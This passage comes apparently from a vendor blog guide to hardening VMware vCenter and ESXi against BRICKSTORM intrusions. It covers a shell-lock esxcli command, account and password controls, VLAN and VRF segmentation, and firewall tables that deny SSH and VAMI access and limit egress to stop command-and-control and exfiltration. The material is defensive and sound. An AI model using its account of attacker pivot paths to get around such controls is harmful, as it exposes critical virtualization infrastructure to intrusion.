</span><code style="vertical-align: baseline;">vpxuser</code><span style="vertical-align: baseline;"> account. Enforce the following configuration on all ESXi 8.0+ hosts to restrict the </span><code style="vertical-align: baseline;">vpxuser</code><span style="vertical-align: baseline;"> identity:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>esxcli system account set -i vpxuser -s false</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">ESXi Host Identity Hardening Strategy</span></h4> <p><span style="vertical-align: baseline;">Additional hardening measures to prevent bypasses via alternative mechanisms, such as Host Profile manipulation, include:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Control Type</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Strategic Requirement</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Implementation</strong><strong style="vertical-align: baseline;"> </strong><strong style="vertical-align: baseline;">Method</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Pivot Mitigation</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">VPXUSER Shell Lock</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Disable shell access for the management account to sever the vCenter-to-Host attack path.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Account Obfuscation</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Rename root Account</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Transition the default </span><code><span style="vertical-align: baseline;">root</span></code><span style="vertical-align: baseline;"> identifier to a unique, non-predictable string to invalidate automated brute-force attempts.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Credential Entropy</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">15+ Character Baseline</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Enforce a strict, system-wide password complexity policy using </span><code><span style="vertical-align: baseline;">Security.PasswordQualityControl</span></code><span style="vertical-align: baseline;">.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Vaulted Identity</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Secure Credentials </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mandate the use of an enterprise password vault for all local host credentials to ensure auditable "break-glass" access.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">ESXi host hardening</span></div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Phase 3: vSphere Network Hardening</span></h3> <h4><span style="vertical-align: baseline;">Securing the Virtualization Network</span></h4> <p><span style="vertical-align: baseline;">Establishing a vSphere Zero Trust network posture is the foundational requirement for securing a resilient Tier-0 architecture. Because the vCenter Server Appliance (VCSA) and ESXi hypervisors lack native MFA support for local privileged accounts, identity-based validation is insufficient as a singular point of security enforcement. Once a threat actor harvests these credentials, the logical network architecture remains the only defensive layer capable of preventing the threat actor's access to the vSphere management plane.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"><span style="font-style: italic; vertical-align: baseline;">A strictly segmented architecture integrating physical network isolation with host-based micro-segmentation serves as the definitive safeguard; by systematically eliminating all logical network paths from untrusted zones to the management zone, the underlying attack vector is neutralized, ensuring that a BRICKSTORM intrusion remains physically and logically incapable of compromising the vCenter control plane.</span></td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The architectural blueprint shown in Figure 2 is designed to eliminate these common internal attack vectors.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/vsphere-brickstorm-fig2.max-1000x1000.jpg" alt="vSphere Zero Trust networking and detection"> </a> <figcaption class="article-image__caption "><p data-block-key="xm3ui">Figure 2: vSphere Zero Trust networking and detection</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">1. Immutable Virtual Local Area Network (VLAN) Segmentation</span></h4> <p><span style="vertical-align: baseline;">Organizations should enforce isolation through distinct 802.1Q VLAN IDs. Threat actors will exploit "flat" or poorly partitioned networks where a compromise in a low-security/low-trust zone (such as a demilitarized zone [DMZ] or edge appliance) can route directly to the Management VAMI (Port 5480) or shell access to the VCSA (Port 22) high-trust network segments.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VLAN</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Members</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Strategic Security Policy</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Host Management</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ESXi Hypervisor Control Plane</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ESXi vmk0 Management Interfaces</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Restricted Access.</strong><span style="vertical-align: baseline;"> Exclusively accepts traffic from the VCSA and authorized PAWs.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VCSA / Infrastructure</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cluster Management Applications</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">vCenter (VCSA), Backup Servers, NSX Managers</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Tier-0 Restricted Zone.</strong><span style="vertical-align: baseline;"> Should be logically and physically unreachable from all Guest VM segments.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">vMotion</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Live Memory Migration</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ESXi </span><span style="vertical-align: baseline;">vmk1</span><span style="vertical-align: baseline;"> (vMotion Stack)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Non-Routable. </strong><span style="vertical-align: baseline;">Prevents interception of unencrypted RAM data during migration.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Storage</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">vSAN / iSCSI / NFS</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ESXi </span><span style="vertical-align: baseline;">vmk2</span><span style="vertical-align: baseline;"> (Storage Stack)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Non-Routable.</strong><span style="vertical-align: baseline;"> Critical for block-level data integrity; prevents out-of-band disk manipulation.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Virtual Machine</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Production Workloads</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Virtual Machine Port Groups</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Untrusted Zone.</strong><span style="vertical-align: baseline;"> Entirely isolated from all infrastructure management VLANs.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Layer 2 segmentation</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">2. Routing as a Security Barrier</span></h4> <p><span style="vertical-align: baseline;">The objective is to transform the Management Network into a secured zone. A threat actor residing on a standard corporate subnet or Wi-Fi network should be physically unable to communicate with the VCSA.</span></p> <h5><span style="vertical-align: baseline;">A. Virtual Routing and Forwarding (VRF) Segmentation</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Action:</strong><span style="vertical-align: baseline;"> Transition all Infrastructure VLANs into a dedicated VRF instance on the core routing layer.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Strategic Impact:</strong><span style="vertical-align: baseline;"> This creates a defined routing table. Even in the event of a total compromise in the "User" or "Guest" VRF, the network hardware will have no route to the "Management" VRF, preventing lateral movement even if physical adjacency exists.</span></p> </li> </ul> <h5><span style="vertical-align: baseline;">B. Privileged Admin Workstation (PAW Exclusive Acce</span><span style="vertical-align: baseline;">ss)</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Action:</strong><span style="vertical-align: baseline;"> Deconstruct all direct routes from the general corporate LAN to the Management Subnet(s).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Strategic Impact:</strong><span style="vertical-align: baseline;"> Access to the Management Subnet should originate from a designated PAW IP range / subnet. All other internal subnets including standard user workstations, and guest VMs should have no route or be subject to an explicit Deny policy at the gateway. This forces the threat actor to attempt a compromise of the PAW, a significantly more hardened and monitored target, before they can connect to the VCSA.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">3. Hardened Perimeter Ingress and Egress Filtering</span></h4> <p><span style="vertical-align: baseline;">These rules should be enforced at the hardware firewall or Layer 3 Core acting as the gateway for the Management Subnet. Because the VCSA's GUI-based native firewall is architecturally incapable of enforcing egress (outbound) policy, the upstream network gateway should enforce this policy. Organizations should implement a restrictive egress policy to ensure that if a VCSA is compromised, it cannot connect to malicious command-and-control infrastructure or exfiltrate Tier-0 data.</span></p> <h5><span style="vertical-align: baseline;">A. Ingress Filtering (Incoming to Management)</span></h5></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Source</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Destination</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Protocol / Port</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Policy</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Mitigation</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">PAW</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mgmt VLAN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP / 443</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ALLOW</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Authorized vSphere Client/API Access</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">PAW</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ESXi VLAN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP / 902</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ALLOW</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Secure Remote Console (MKS) Access</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">ESXi</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">VCSA IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP / 443 </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ALLOW</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ESXi Host to vCenter communication</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Backup </strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">VCSA IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP / 443</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ALLOW</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Backup API Access </span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Monitoring</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mgmt VLAN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ICMP Ping</span></p> <p><span style="vertical-align: baseline;">UDP / 161 (SNMP)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ALLOW</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Verified Infrastructure Health Probes</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">ANY</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mgmt VLAN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP / 22</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">DENY</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MANDATORY SSH BLOCK.</strong><span style="vertical-align: baseline;"> Enforce shell access via PAW only.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">ANY</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mgmt VLAN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP / 5480</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">DENY</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MANDATORY VAMI BLOCK. </strong><span style="vertical-align: baseline;">Prevents unauthorized management enablement.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Guest VM</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mgmt VLAN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ANY</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">DENY</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Eliminates all East-West lateral movement paths</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Ingress filtering</span></div></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">B. Egress Filtering (Outbound from VCSA/Management)</span></h5></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Source</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Destination</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Protocol / Port</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Policy</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Mitigation</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VCSA</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Internal DNS</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UDP/TCP 53</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ALLOW</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Restrict DNS to trusted internal resolvers only.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VCSA</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Remote Syslog</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP / 6514</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ALLOW</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TLS Encrypted Telemetry. Required for SIEM visibility</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VCSA</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Public IP for VMware Update Manager</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP / 443</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ALLOW</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Strictly limit to </span><span style="vertical-align: baseline;">"162.159.140.167" and "172.66.0.165" (VMware Update servers)</span><span style="vertical-align: baseline;">.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VCSA</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Identity Provider</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP / 443</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ALLOW</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Required for Federated Authentication (Okta/Entra)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VCSA</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Internal Subnets</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ANY</span></p> </td> <td style="vertical-align: middle; border: 1px 